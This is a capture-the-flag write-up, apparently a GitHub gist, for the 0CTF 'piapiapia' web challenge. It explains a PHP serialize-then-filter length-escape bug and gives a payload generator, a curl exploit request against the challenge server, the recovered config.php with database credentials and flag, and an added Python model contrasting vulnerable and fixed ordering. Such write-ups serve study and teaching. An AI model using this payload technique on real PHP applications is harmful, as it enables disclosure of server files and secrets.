@h-otter
Last active March 15, 2016 13:14
0ctf-piapiapia

piapiapia (Web 6pts)

Points

  • We can post any string to update.php as a "nickname" array (an array bypasses the length check a plain string would hit).
  • The serialized object is broken by the order serialize() then filter(): the filter rewrites the already serialized data.
  • The string grows by one character per match, because filter() replaces 'where' with 'hacker' inside the serialized string while the s:N length prefixes were computed before the replacement.

Howto

nickname.py

#!/usr/bin/python
# -*- coding:utf-8 -*-
import urllib, urllib2
# --- main ---
def main():
  # Tail that unserialize() reads once it is pushed outside the nickname string:
  # it closes the nickname array and re-declares 'photo' as config.php.
  suffix = '";}s:5:"photo";s:10:"config.php'
  # Each 'where' becomes 'hacker' (+1 char) after serialize(), so len(suffix)
  # copies shift the declared string length by exactly len(suffix) bytes.
  string = "where" * len(suffix) + suffix
  print "[+] attack with string: %s" % string
if __name__ == '__main__':
  main()

I posted the generated string to update.php as 'nickname[]' with curl.

$ curl -v -F photo=@./hoge -F phone=11111111111 -F email="hoge@hoge.hoge" -F nickname[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere;}s:5:photo;s:10:config.php -b "PHPSESSID=qqvl7cuj1lru13a3rimfjme4u5" http://202.120.7.203:8888/update.php

After the update, the flag can be read from the src attribute of the profile's img tag: the "photo" is now config.php, served base64-encoded.

config.php

<?php
        // The variable names were stripped when this page was rendered;
        // $config and $flag are restored here as an assumption.
        $config['hostname'] = '127.0.0.1';
        $config['username'] = '0ctf';
        $config['password'] = 'oh-my-****-web';
        $config['database'] = '0CTF_WEB';
        $flag = '0ctf{fa717b49649fbb9c0dd0d1663469a871}';
?>
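To show why the Points above hold, here is an added Python example (not from the gist or the challenge source) with a toy PHP serialize()/unserialize() pair. store_vulnerable() applies the challenge's order (serialize, then filter) and store_fixed() the safe order (filter each field, then serialize); the profile values and the function names are constructed for this illustration.

```python
import re

def php_serialize(v):
    """Serialize str / int / dict / list like PHP serialize() (no escaping, as in PHP)."""
    if isinstance(v, str):
        return 's:%d:"%s";' % (len(v), v)
    if isinstance(v, int):
        return 'i:%d;' % v
    items = v.items() if isinstance(v, dict) else enumerate(v)
    return 'a:%d:{%s}' % (len(v), "".join(php_serialize(k) + php_serialize(x) for k, x in items))

def php_unserialize(s):
    """Minimal unserialize(): trusts the s:N length prefix and ignores trailing bytes, as PHP does."""
    def parse(pos):
        if s[pos] == 'i':
            m = re.compile(r'i:(-?\d+);').match(s, pos)
            return int(m.group(1)), m.end()
        if s[pos] == 's':
            m = re.compile(r's:(\d+):"').match(s, pos)
            n, start = int(m.group(1)), m.end()
            if s[start + n:start + n + 2] != '";':
                raise ValueError("bad string terminator at offset %d" % (start + n))
            return s[start:start + n], start + n + 2
        if s[pos] == 'a':
            m = re.compile(r'a:(\d+):\{').match(s, pos)
            count, pos, out = int(m.group(1)), m.end(), {}
            for _ in range(count):
                k, pos = parse(pos)
                out[k], pos = parse(pos)
            if s[pos] != '}':
                raise ValueError("bad array terminator at offset %d" % pos)
            return out, pos + 1
        raise ValueError("unsupported type at offset %d" % pos)
    return parse(0)[0]

def filter_words(s):
    """The page's filter(): a blacklisted word replaced by a longer one, +1 char per hit."""
    return s.replace("where", "hacker")
def store_vulnerable(profile):
    """Challenge order: serialize, then filter the blob; every s:N prefix goes stale."""
    return php_unserialize(filter_words(php_serialize(profile)))
def store_fixed(profile):
    """Safe order: filter each field, then serialize; s:N is computed on the final bytes."""
    clean = {k: [filter_words(x) for x in v] if isinstance(v, list) else filter_words(v)
             for k, v in profile.items()}
    return php_unserialize(php_serialize(clean))
# Constructed profile using the page's payload: nickname posted as an array, suffix from nickname.py.
SUFFIX = '";}s:5:"photo";s:10:"config.php'
PROFILE = {"phone": "11111111111", "email": "hoge@hoge.hoge",
           "nickname": ["where" * len(SUFFIX) + SUFFIX], "photo": "avatar.jpg"}
```

In the vulnerable order the parser stops reading nickname[0] right after the run of 'hacker', consumes the injected tail as the photo entry and silently ignores the real photo that now trails the closing brace; in the fixed order the same input round-trips with its photo intact.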